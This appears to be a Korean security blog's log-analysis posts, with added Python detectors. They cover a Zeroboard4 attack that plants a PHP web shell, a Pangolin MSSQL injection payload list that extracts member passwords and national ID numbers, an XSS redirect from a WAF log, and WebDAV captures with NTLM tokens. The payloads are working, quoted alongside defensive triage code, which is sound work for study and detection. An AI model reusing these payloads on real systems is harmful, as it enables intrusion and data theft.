SharinGan Scanner 1.2.1

webhxxx/weblog 2010. 11. 22. 13:19 |
SharinGan Scanner 1.2.1: what is this thing?

Posted by applicationlayer

Android user-agent

webhxxx/weblog 2010. 5. 11. |
User-Agent: Mozilla/5.0 (Linux; U; Android 2.1-update1; ko-kr; XT720 Build/STSKT_N_79.11.36R) AppleWebKit/530.17 (KHTML, like Gecko) Version/4.0 Mobile Safari/530.17


Honeypot

webhxxx/weblog 2010. 3. 14. 20:21 |

Web shell attack using a Zeroboard4 code-execution vulnerability

webhxxx/weblog 2010. 3. 9. |
This is a Zeroboard attack log I found a little while ago.

The attacker used the PoC exactly as published:
http://www.milw0rm.com/exploits/9590

/bbs/lib.php?REMOTE_ADDR=*/fputs(fopen(chr(46).chr(47).chr(115).chr(104).chr(101).chr(108).chr(108).chr(46).chr(112).chr(104).chr(112),chr(119).chr(43)),chr(60).chr(63).chr(32).chr(115).chr(121).chr(115).chr(116).chr(101).chr(109).chr(40).chr(36).chr(99).chr(109).chr(100).chr(41).chr(59).chr(32).chr(63).chr(62));/*&HTTP_SESSION_VARS[zb_last_connect_check]=a&HTTP_SERVER_VARS=1&HTTP_ENV_VARS=

Decoded into readable form =>

/bbs/lib.php?REMOTE_ADDR=*/fputs(fopen(./shell.php,w+),[web shell contents]);/*&HTTP_SESSION_VARS[zb_last_connect_check]=a&HTTP_SERVER_VARS=1&HTTP_ENV_VARS=

The file that was created:
=====shell.php========
<? system($cmd); ?>


Pangolin(MSSQL)

webhxxx/weblog 2009. 12. 18. 17:22 |
-Information
--Version : ' and @@version=1--
--Db Name : ' and db_name()=0--
--Server Name : ' and @@servername=0--
--Host Name : ' and host_name()=0--
--System User : ' and system_user=0--
--Current User : ' and user=0--
--Privilege : ' and cast(is_srvrolemember(0x730079007300610064006d0069006e00) as nvarchar(1))+char(124)=1--
--Databases :
' and 0=(select top 1 cast([name] as nvarchar(256))+char(94)+cast([filename] as nvarchar(256)) from(select top  1 dbid,name,filename from [master].[dbo].[sysdatabases] order by [dbid]) t order by [dbid] desc)--
' and 0=(select top 1 cast([name] as nvarchar(256))+char(94)+cast([filename] as nvarchar(256)) from(select top  2 dbid,name,filename from [master].[dbo].[sysdatabases] order by [dbid]) t order by [dbid] desc)--
...
Stop when the same response comes back.

--Drivers :
'%20;drop%20table%20pangolin_test_table;--
'%20;create%20table%20pangolin_test_table(name%20nvarchar(255),low%20nvarchar(255),high%20nvarchar(255),type%20nvarchar(255));--
'%20;insert%20pangolin_test_table%20exec%20master.dbo.xp_availablemedia;--
'%20and%200=(select%20top%201%20cast([name]%20as%20nvarchar(4000))%2bchar(94)%2bcast([type]%20as%20nvarchar(4000))%20from(select%20top%20%201%20[name],[low],[high],[type]%20from%20pangolin_test_table%20group%20by%20[name],[low],[high],[type]%20order%20by%20[name])%20t%20order%20by%20[name]%20desc)----
'%20and%200=(select%20top%201%20cast([name]%20as%20nvarchar(4000))%2bchar(94)%2bcast([type]%20as%20nvarchar(4000))%20from(select%20top%20%202%20[name],[low],[high],[type]%20from%20pangolin_test_table%20group%20by%20[name],[low],[high],[type]%20order%20by%20[name])%20t%20order%20by%20[name]%20desc)----
'%20and%200=(select%20top%201%20cast([name]%20as%20nvarchar(4000))%2bchar(94)%2bcast([type]%20as%20nvarchar(4000))%20from(select%20top%20%203%20[name],[low],[high],[type]%20from%20pangolin_test_table%20group%20by%20[name],[low],[high],[type]%20order%20by%20[name])%20t%20order%20by%20[name]%20desc)----
'%20;drop%20table%20pangolin_test_table;--

--LocalGroups :
'%20;drop%20table%20pangolin_test_table;--
'%20;create%20table%20pangolin_test_table(name%20nvarchar(255),description%20nvarchar(4000));--
'%20;insert%20pangolin_test_table%20exec%20master.dbo.xp_enumgroups;--
'%20and%200=(select%20top%201%20cast([name]%20as%20nvarchar(4000))%2bchar(94)%2bcast([description]%20as%20nvarchar(4000))%20from(select%20top%20%201%20[name],[description]%20from%20pangolin_test_table%20group%20by%20[name],[description]%20order%20by%20[name])%20t%20order%20by%20[name]%20desc)----
'%20and%200=(select%20top%201%20cast([name]%20as%20nvarchar(4000))%2bchar(94)%2bcast([description]%20as%20nvarchar(4000))%20from(select%20top%20%202%20[name],[description]%20from%20pangolin_test_table%20group%20by%20[name],[description]%20order%20by%20[name])%20t%20order%20by%20[name]%20desc)----
'%20and%200=(select%20top%201%20cast([name]%20as%20nvarchar(4000))%2bchar(94)%2bcast([description]%20as%20nvarchar(4000))%20from(select%20top%20%203%20[name],[description]%20from%20pangolin_test_table%20group%20by%20[name],[description]%20order%20by%20[name])%20t%20order%20by%20[name]%20desc)----
URL-decoded:
' ;drop table pangolin_test_table;--
' ;create table pangolin_test_table(name nvarchar(255),description nvarchar(4000));--
' ;insert pangolin_test_table exec master.dbo.xp_enumgroups;--
' and 0=(select top 1 cast([name] as nvarchar(4000))+char(94)+cast([description] as nvarchar(4000)) from(select top  1 [name],[description] from pangolin_test_table group by [name],[description] order by [name]) t order by [name] desc)----
' and 0=(select top 1 cast([name] as nvarchar(4000))+char(94)+cast([description] as nvarchar(4000)) from(select top  2 [name],[description] from pangolin_test_table group by [name],[description] order by [name]) t order by [name] desc)----
' and 0=(select top 1 cast([name] as nvarchar(4000))+char(94)+cast([description] as nvarchar(4000)) from(select top  3 [name],[description] from pangolin_test_table group by


-Data
--Tables (lookup)
' and (select cast(count(1) as varchar(10))+char(94) from [sysobjects] where xtype=char(85) and status!=0)=0--
Number of sysobjects records whose xtype is U (that is, the number of user tables)

' and (select top 1 cast(name as varchar(256)) from(select top 1 id,name from [sysobjects] where xtype=char(85) and status!=0 order by id) t order by id desc)=0--
' and (select top 1 cast(name as varchar(256)) from(select top 2 id,name from [sysobjects] where xtype=char(85) and status!=0 order by id) t order by id desc)=0--
' and (select top 1 cast(name as varchar(256)) from(select top 3 id,name from [sysobjects] where xtype=char(85) and status!=0 order by id) t order by id desc)=0--
Extracting the table names

--Columns
' and (select top 1 cast(id as nvarchar(20))+char(124)  from [sysobjects] where name=0x6d0065006d00620065007200)=0--
The table name is converted to hex (filter evasion) and its id is extracted (from sysobjects)

' and (select cast(count(1) as varchar(10))+char(94) from [syscolumns] where id=549576996)=0--
Extract the number of columns with that id (from syscolumns)

' and (select top 1 cast(name as varchar(8000)) from (select top 1 colid,name from [syscolumns] where id=549576996 order by colid) t order by colid desc)=0--
Extract each column's name (from syscolumns)
.
.
.
' and (select top 1 cast(name as varchar(8000)) from (select top 2 colid,name from [syscolumns] where id=549576996 order by colid) t order by colid desc)=0--
Keep extracting

--Datas
' and (select cast(count(1) as varchar(8000))+char(94) from [member] where 1=1)=0--
Extract the number of records in that table (member)

' and (select top 1
isnull(cast([mem_id] as nvarchar(4000)),char(32))
+char(94)+
isnull(cast([mem_pwd] as nvarchar(4000)),char(32))
+char(94)+
isnull(cast([mem_name] as nvarchar(4000)),char(32))
+char(94)+
isnull(cast([mem_jumin] as nvarchar(4000)),char(32))
+char(94)+
isnull(cast([mem_zip] as nvarchar(4000)),char(32))
+char(94)+
isnull(cast([mem_addr1] as nvarchar(4000)),char(32))
+char(94)+
isnull(cast([mem_addr2] as nvarchar(4000)),char(32))
+char(94)+
isnull(cast([mem_tel] as nvarchar(4000)),char(32))
+char(94)+
isnull(cast([mem_hp] as nvarchar(4000)),char(32))
+char(94)+
isnull(cast([mem_email] as nvarchar(4000)),char(32))
+char(94)+
isnull(cast([mem_wtday] as nvarchar(4000)),char(32))
from [member] where 1=1 order by [mem_id])=0--
Retrieving the field values of each record

To be continued..
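The payload list above is what Pangolin's MSSQL mode sends: stacked ;drop/;create/;insert statements into a pangolin_test_table scratch table, xp_ extended procedures, sysobjects/syscolumns/sysdatabases lookups and the nested "select top N ... from(select top N ...)" pagination that walks results one row at a time. As an added example, not code from the blog, the Python script below URL-decodes request lines the way a WAF or web-server log records them and reports which of those fingerprints each one trips. The /board.asp?id= path and the four request lines are constructed samples; the rule names are this example's own.

```python
import re
from urllib.parse import unquote_plus

# Constructed sample request lines. The first three reuse payload shapes quoted
# in the post, URL-encoded the way a WAF or IIS log records them; the /board.asp
# path is made up. The last line is ordinary traffic for comparison.
SAMPLE_REQUESTS = [
    "GET /board.asp?id=1'%20and%20@@version=1-- HTTP/1.1",
    "GET /board.asp?id=1'%20;insert%20pangolin_test_table%20exec%20master.dbo.xp_enumgroups;-- HTTP/1.1",
    "GET /board.asp?id=1'%20and%20(select%20top%201%20cast(name%20as%20varchar(256))%20from(select%20top%201%20id,name%20from%20[sysobjects]%20where%20xtype=char(85)%20and%20status!=0%20order%20by%20id)%20t%20order%20by%20id%20desc)=0-- HTTP/1.1",
    "GET /board.asp?id=1&page=2 HTTP/1.1",
]

# Each rule names one fingerprint visible in the Pangolin payloads above.
RULES = {
    "mssql_system_variable": re.compile(r"@@(version|servername|spid|language)\b"),
    "mssql_metadata_function": re.compile(r"\b(db_name|host_name|system_user|is_srvrolemember)\b"),
    "stacked_query_ddl": re.compile(r";\s*(drop|create|insert)\s+(table\s+)?\w+"),
    "pangolin_scratch_table": re.compile(r"pangolin_test_table"),
    "extended_stored_procedure": re.compile(r"\bxp_\w+"),
    "catalog_enumeration": re.compile(r"\b(sysobjects|syscolumns|sysdatabases)\b"),
    "nested_top_n_pagination": re.compile(r"select\s+top\s+\d+\s+.*?\bfrom\s*\(\s*select\s+top\s+\d+"),
    "inline_comment_terminator": re.compile(r"--\s*$"),
}

REQUEST_LINE = re.compile(r"^[A-Z]+\s+(\S+)\s+HTTP/\d\.\d$")


def normalize(request_line: str) -> str:
    """Pull the target out of 'METHOD target HTTP/x.y' (or take the whole
    string if it is a bare query), URL-decode it the way the server would,
    then collapse whitespace and lower-case it for matching."""
    m = REQUEST_LINE.match(request_line.strip())
    target = m.group(1) if m else request_line
    decoded = unquote_plus(target)
    return re.sub(r"\s+", " ", decoded).strip().lower()


def classify(request_line: str) -> dict:
    """Return the matching rule names and a verdict. A trailing '--' on its
    own is not enough: at least one substantive fingerprint has to fire."""
    norm = normalize(request_line)
    hits = [name for name, rx in RULES.items() if rx.search(norm)]
    substantive = [h for h in hits if h != "inline_comment_terminator"]
    return {"normalized": norm, "hits": hits, "verdict": "sqli" if substantive else "clean"}


if __name__ == "__main__":
    for line in SAMPLE_REQUESTS:
        r = classify(line)
        print(f"{r['verdict']:5} {r['hits']}  {r['normalized'][:60]}")
```

Signature matching like this is a detection fallback, not the fix: the queries only work because user input is concatenated into SQL, so parameterized queries stop the whole list at once, and the is_srvrolemember(sysadmin) probe in the post is a reminder that the web application's database login should not hold that role or be able to reach xp_ procedures.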

User-Agent: Mediapartners-Google

webhxxx/weblog 2009. 10. 1. |

A log left on the web application firewall appliance.

It was recorded under the attack name XSS.

GET /XXX.html?xxx=1&xxx=110&xxx=1602&xxx=25&xxx=301&xxx=xxx&xxx=13%22%3E%3Cscript%3Eself.location=String.fromCharCode(104,116,116,112,58,47,47,103,111,111,103,108,101,46,99,111,109);%3C/script%3E HTTP/1.1
Host: www.xxx.xx.xx
Connection: Keep-alive
Accept: */*
User-Agent: Mediapartners-Google
Accept-Encoding: gzip,deflate

Decoded:

"><script>self.location=String.fromCharCode(104,116,116,112,58,47,47,103,111,111,103,108,101,46,99,111,109);</script>
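Both this WAF entry and the Zeroboard lib.php request in the post above hide their payload behind lists of character codes (PHP chr(N).chr(N) chains in one case, JavaScript String.fromCharCode in the other). Decoding such entries by hand is slow and error-prone, so here is an added Python triage helper, not part of the blog: it URL-decodes a logged request line, rewrites both idioms as quoted literals, and flags markers that have no business in normal traffic. The two sample lines are constructed copies of the entries quoted in the posts, and the marker names are this example's own.

```python
import re
from urllib.parse import unquote

# Constructed samples modelled on the two log entries quoted in the posts:
# the Zeroboard lib.php request and the WAF-logged XSS request.
SAMPLE_LINES = [
    "/bbs/lib.php?REMOTE_ADDR=*/fputs(fopen(chr(46).chr(47).chr(115).chr(104).chr(101).chr(108).chr(108).chr(46).chr(112).chr(104).chr(112),chr(119).chr(43)),chr(60).chr(63).chr(32).chr(115).chr(121).chr(115).chr(116).chr(101).chr(109).chr(40).chr(36).chr(99).chr(109).chr(100).chr(41).chr(59).chr(32).chr(63).chr(62));/*&HTTP_SESSION_VARS[zb_last_connect_check]=a&HTTP_SERVER_VARS=1&HTTP_ENV_VARS=",
    "GET /XXX.html?xxx=13%22%3E%3Cscript%3Eself.location=String.fromCharCode(104,116,116,112,58,47,47,103,111,111,103,108,101,46,99,111,109);%3C/script%3E HTTP/1.1",
]

# A run of PHP chr(N) calls joined with "." (e.g. chr(46).chr(47))
CHR_CHAIN = re.compile(r"chr\(\d+\)(?:\s*\.\s*chr\(\d+\))*")
# JavaScript String.fromCharCode(104,116,...)
FROM_CHAR_CODE = re.compile(r"String\.fromCharCode\(\s*([\d\s,]+?)\s*\)")


def decode_chr_chain(chain: str) -> str:
    """Turn chr(46).chr(47)... into the literal string it builds."""
    return "".join(chr(int(n)) for n in re.findall(r"chr\((\d+)\)", chain))


def decode_char_codes(codes: str) -> str:
    """Turn the comma list inside String.fromCharCode(...) into a string."""
    return "".join(chr(int(n)) for n in codes.split(",") if n.strip())


def deobfuscate(line: str) -> str:
    """URL-decode a request line, then replace both obfuscation idioms with
    quoted literals so the intent of the request is readable."""
    text = unquote(line)
    text = CHR_CHAIN.sub(lambda m: '"' + decode_chr_chain(m.group(0)) + '"', text)
    text = FROM_CHAR_CODE.sub(lambda m: '"' + decode_char_codes(m.group(1)) + '"', text)
    return text


# Markers that a decoded request should not contain in normal traffic.
MARKERS = {
    "php_file_write": re.compile(r"\b(fputs|fwrite|file_put_contents)\s*\(\s*fopen\s*\(", re.I),
    "php_command_exec": re.compile(r"\b(system|exec|passthru|shell_exec)\s*\(", re.I),
    "comment_breakout": re.compile(r"\*/.*?/\*", re.S),
    "html_script_tag": re.compile(r"<script\b", re.I),
    "js_redirect": re.compile(r"\b(self|window|document)\.location\s*=", re.I),
}


def triage(line: str) -> dict:
    """Decode one log line and report which markers it trips."""
    decoded = deobfuscate(line)
    hits = [name for name, rx in MARKERS.items() if rx.search(decoded)]
    return {"decoded": decoded, "hits": hits, "suspicious": bool(hits)}


if __name__ == "__main__":
    for raw in SAMPLE_LINES:
        result = triage(raw)
        print(result["hits"], "->", result["decoded"])
```

Running the markers over the decoded text rather than the raw line is the point: the raw Zeroboard entry contains neither "shell.php" nor "system(", and the raw WAF entry contains no "<script>", so rules keyed on the plain strings would miss both.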

Information about Mediapartners-Google can be found at http://www.internetofficer.com/web-robot/adsense/

[webdav] Traffic generated when using the web folder service

webhxxx/weblog 2009. 9. 30. |
PROPFIND /abcde HTTP/1.1
Content-Language: en-us
Accept-Language: ko, en-us;q=0.2
Content-Type: text/xml
Translate: f
Depth: 0
Content-Length: 0
User-Agent: Microsoft Data Access Internet Publishing Provider DAV
Host: 192.168.1.152
Connection: Keep-Alive


PROPFIND /abcde HTTP/1.1
Content-Language: en-us
Accept-Language: ko, en-us;q=0.2
Content-Type: text/xml
Translate: f
Depth: 0
Content-Length: 0
User-Agent: Microsoft Data Access Internet Publishing Provider DAV
Host: 192.168.1.152
Connection: Keep-Alive
Authorization: Negotiate TlRMTVNTUAABAAAAB4IIogAAAAAAAAAAAAAAAAAAAAAFASgKAAAADw==


PROPFIND /abcde HTTP/1.1
Content-Language: en-us
Accept-Language: ko, en-us;q=0.2
Content-Type: text/xml
Translate: f
Depth: 0
Content-Length: 0
User-Agent: Microsoft Data Access Internet Publishing Provider DAV
Host: 192.168.1.152
Connection: Keep-Alive
Authorization: Negotiate TlRMTVNTUAADAAAAGAAYAJ4AAAAYABgAtgAAAB4AHgBIAAAAGgAaAGYAAAAeAB4AgAAAAAAAAADOAAAABYKIogUBKAoAAAAPTgBPAFcAQwBPAE0ALQBRADYAVABRADMARgBUAFkAYQBkAG0AaQBuAGkAcwB0AHIAYQB0AG8AcgBGAFUASgBJAFQAUwBVAC0ANAA3ADcANwA4AEIARQDsnDdeAQV/SQAAAAAAAAAAAAAAAAAAAACh8p+t4T4+XdZdtsV4s8tj/GcgVyT3lr0=


PROPFIND /abcde HTTP/1.1
Content-Language: en-us
Accept-Language: ko, en-us;q=0.2
Content-Type: text/xml
Translate: f
Depth: 1
Content-Length: 0
User-Agent: Microsoft Data Access Internet Publishing Provider DAV
Host: 192.168.1.152
Connection: Keep-Alive
Authorization: Negotiate TlRMTVNTUAABAAAAB4IIogAAAAAAAAAAAAAAAAAAAAAFASgKAAAADw==


PROPFIND /abcde HTTP/1.1
Content-Language: en-us
Accept-Language: ko, en-us;q=0.2
Content-Type: text/xml
Translate: f
Depth: 1
User-Agent: Microsoft Data Access Internet Publishing Provider DAV
Host: 192.168.1.152
Connection: Keep-Alive
Authorization: Negotiate TlRMTVNTUAADAAAAGAAYAJ4AAAAYABgAtgAAAB4AHgBIAAAAGgAaAGYAAAAeAB4AgAAAAAAAAADOAAAABYKIogUBKAoAAAAPTgBPAFcAQwBPAE0ALQBRADYAVABRADMARgBUAFkAYQBkAG0AaQBuAGkAcwB0AHIAYQB0AG8AcgBGAFUASgBJAFQAUwBVAC0ANAA3ADcANwA4AEIARQD5Ny27vKTK/wAAAAAAAAAAAAAAAAAAAAARj63LuPEW89D65dh5MzMarSXKO+g/NAk=
Content-Length: 489

<?xml version="1.0" encoding="UTF-8" ?>
<a:propfind xmlns:a="DAV:" xmlns:b="urn:schemas-microsoft-com:datatypes">
<a:prop>
<a:name/>
<a:parentname/>
<a:href/>
<a:ishidden/>
<a:isreadonly/>
<a:getcontenttype/>
<a:contentclass/>
<a:getcontentlanguage/>
<a:creationdate/>
<a:lastaccessed/>
<a:getlastmodified/>
<a:getcontentlength/>
<a:iscollection/>
<a:isstructureddocument/>
<a:defaultdocument/>
<a:displayname/>
<a:isroot/>
<a:resourcetype/>
</a:prop>
</a:propfind>


OPTIONS / HTTP/1.1
Translate: f
User-Agent: Microsoft Data Access Internet Publishing Provider Protocol Discovery
Host: 192.168.1.152
Content-Length: 0
Connection: Keep-Alive


OPTIONS /abcde/%EC%9C%A0 HTTP/1.1
Translate: f
User-Agent: Microsoft Data Access Internet Publishing Provider Protocol Discovery
Host: 192.168.1.152
Content-Length: 0
Connection: Keep-Alive


OPTIONS /abcde/%EC%9C%A0 HTTP/1.1
Translate: f
User-Agent: Microsoft Data Access Internet Publishing Provider Protocol Discovery
Host: 192.168.1.152
Content-Length: 0
Connection: Keep-Alive
Authorization: Negotiate TlRMTVNTUAABAAAAB4IIogAAAAAAAAAAAAAAAAAAAAAFASgKAAAADw==


OPTIONS /abcde/%EC%9C%A0 HTTP/1.1
Translate: f
User-Agent: Microsoft Data Access Internet Publishing Provider Protocol Discovery
Host: 192.168.1.152
Content-Length: 0
Connection: Keep-Alive
Authorization: Negotiate TlRMTVNTUAADAAAAGAAYAJ4AAAAYABgAtgAAAB4AHgBIAAAAGgAaAGYAAAAeAB4AgAAAAAAAAADOAAAABYKIogUBKAoAAAAPTgBPAFcAQwBPAE0ALQBRADYAVABRADMARgBUAFkAYQBkAG0AaQBuAGkAcwB0AHIAYQB0AG8AcgBGAFUASgBJAFQAUwBVAC0ANAA3ADcANwA4AEIARQAn6dHO6R2IbwAAAAAAAAAAAAAAAAAAAAD3pcr4LPCeDLyddbAl5j2KJKQ5h+yDKDo=


PROPFIND /abcde/%EC%9C%A0 HTTP/1.1
Content-Language: en-us
Accept-Language: ko, en-us;q=0.2
Content-Type: text/xml
Translate: f
Depth: 0
Content-Length: 0
User-Agent: Microsoft Data Access Internet Publishing Provider DAV
Host: 192.168.1.152
Connection: Keep-Alive


PROPFIND /abcde/%EC%9C%A0 HTTP/1.1
Content-Language: en-us
Accept-Language: ko, en-us;q=0.2
Content-Type: text/xml
Translate: f
Depth: 1
Content-Length: 0
User-Agent: Microsoft Data Access Internet Publishing Provider DAV
Host: 192.168.1.152
Connection: Keep-Alive
Authorization: Negotiate TlRMTVNTUAABAAAAB4IIogAAAAAAAAAAAAAAAAAAAAAFASgKAAAADw==

=============File request from folder to folder=============================
GET /abcde/%EC%9C%A0/%EC%9C%A0.txt HTTP/1.1
Content-Language: en-us
Accept-Language: ko, en-us;q=0.2
Translate: f
User-Agent: Microsoft Data Access Internet Publishing Provider DAV
Host: 192.168.1.152
Connection: Keep-Alive

=============File request via the web=============================
GET /abcde/%C0%AF/%C0%AF.txt HTTP/1.0
Accept: */*
Accept-Language: ko
UA-CPU: x86
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1) ; .NET CLR 1.1.4322; .NET CLR 2.0.50727; .NET CLR 3.0.04506.30; .NET CLR 3.0.4506.2152; .NET CLR 3.5.30729; MS-RTC LM 8)
Host: 192.168.1.152
Connection: Keep-Alive
2009/05/19 16:21
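The Authorization: Negotiate values in the PROPFIND and OPTIONS requests above are base64 NTLMSSP messages: the short one is the client's Type 1 NEGOTIATE, the long one its Type 3 AUTHENTICATE. When reviewing WebDAV traffic a defender usually wants to know which account and workstation the client presented, without doing anything with the response hashes. The following is an added Python parser written for this page, not code from the blog; it reads the fixed NTLMSSP header and the security buffers from the two tokens quoted above (copied here as constants) and reports the message type, negotiated flags, OS version block and, for Type 3, the domain, user and workstation names.

```python
import base64
import struct

# The two Authorization: Negotiate values from the WebDAV capture above
# (the client's Type 1 NEGOTIATE and its Type 3 AUTHENTICATE message).
TYPE1_TOKEN = "TlRMTVNTUAABAAAAB4IIogAAAAAAAAAAAAAAAAAAAAAFASgKAAAADw=="
TYPE3_TOKEN = "TlRMTVNTUAADAAAAGAAYAJ4AAAAYABgAtgAAAB4AHgBIAAAAGgAaAGYAAAAeAB4AgAAAAAAAAADOAAAABYKIogUBKAoAAAAPTgBPAFcAQwBPAE0ALQBRADYAVABRADMARgBUAFkAYQBkAG0AaQBuAGkAcwB0AHIAYQB0AG8AcgBGAFUASgBJAFQAUwBVAC0ANAA3ADcANwA4AEIARQDsnDdeAQV/SQAAAAAAAAAAAAAAAAAAAACh8p+t4T4+XdZdtsV4s8tj/GcgVyT3lr0="

SIGNATURE = b"NTLMSSP\x00"
NEGOTIATE_UNICODE = 0x00000001   # string fields are UTF-16LE
NEGOTIATE_VERSION = 0x02000000   # an 8-byte version block follows the fixed fields


def _read_field(buf: bytes, at: int) -> bytes:
    """NTLM security buffer: u16 length, u16 max length, u32 offset into the token."""
    length, _maxlen, offset = struct.unpack_from("<HHI", buf, at)
    if offset + length > len(buf):
        raise ValueError("security buffer points outside the token")
    return buf[offset:offset + length]


def _decode(raw: bytes, flags: int) -> str:
    return raw.decode("utf-16-le") if flags & NEGOTIATE_UNICODE else raw.decode("latin-1")


def parse_ntlm_header(header_value: str) -> dict:
    """Parse an 'Authorization: Negotiate <base64>' (or 'NTLM <base64>') value
    and return what it reveals about the client."""
    scheme, _, token = header_value.strip().partition(" ")
    if scheme not in ("Negotiate", "NTLM"):
        raise ValueError(f"unsupported scheme {scheme!r}")
    buf = base64.b64decode(token)
    if not buf.startswith(SIGNATURE):
        raise ValueError("not a raw NTLMSSP token (possibly SPNEGO-wrapped Kerberos)")
    msg_type = struct.unpack_from("<I", buf, 8)[0]
    info = {"type": msg_type}
    if msg_type == 1:
        info["flags"] = struct.unpack_from("<I", buf, 12)[0]
        version_at = 32
    elif msg_type == 3:
        if len(buf) < 64:
            raise ValueError("Type 3 token too short to carry flags")
        flags = struct.unpack_from("<I", buf, 60)[0]
        info["flags"] = flags
        info["domain"] = _decode(_read_field(buf, 28), flags)
        info["user"] = _decode(_read_field(buf, 36), flags)
        info["workstation"] = _decode(_read_field(buf, 44), flags)
        # 24 bytes here is the NTLMv1-style response; NTLMv2 responses are longer.
        info["nt_response_len"] = struct.unpack_from("<H", buf, 20)[0]
        version_at = 64
    else:
        return info  # Type 2 is the server challenge; it carries no client identity
    if info["flags"] & NEGOTIATE_VERSION and len(buf) >= version_at + 8:
        major, minor, build = struct.unpack_from("<BBH", buf, version_at)
        info["os_version"] = f"{major}.{minor}.{build}"
    return info


def identity(header_value: str) -> str:
    """One-line attribution for a Type 3 token, e.g. DOMAIN\\user@WORKSTATION."""
    info = parse_ntlm_header(header_value)
    if info["type"] != 3:
        return f"NTLM type {info['type']} (no identity yet)"
    return f"{info['domain']}\\{info['user']}@{info['workstation']}"


if __name__ == "__main__":
    print(parse_ntlm_header("Negotiate " + TYPE1_TOKEN))
    print(identity("Negotiate " + TYPE3_TOKEN))
```

On the captures above the parser yields the account name the client presented, the name it sent in the domain field, the workstation name, and a version block of 5.1.2600 (Windows XP). The 24-byte NT response is the NTLMv1-style format; seeing it in a capture is itself worth noting, since NTLMv2 or Kerberos is what should be negotiated on a current network.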
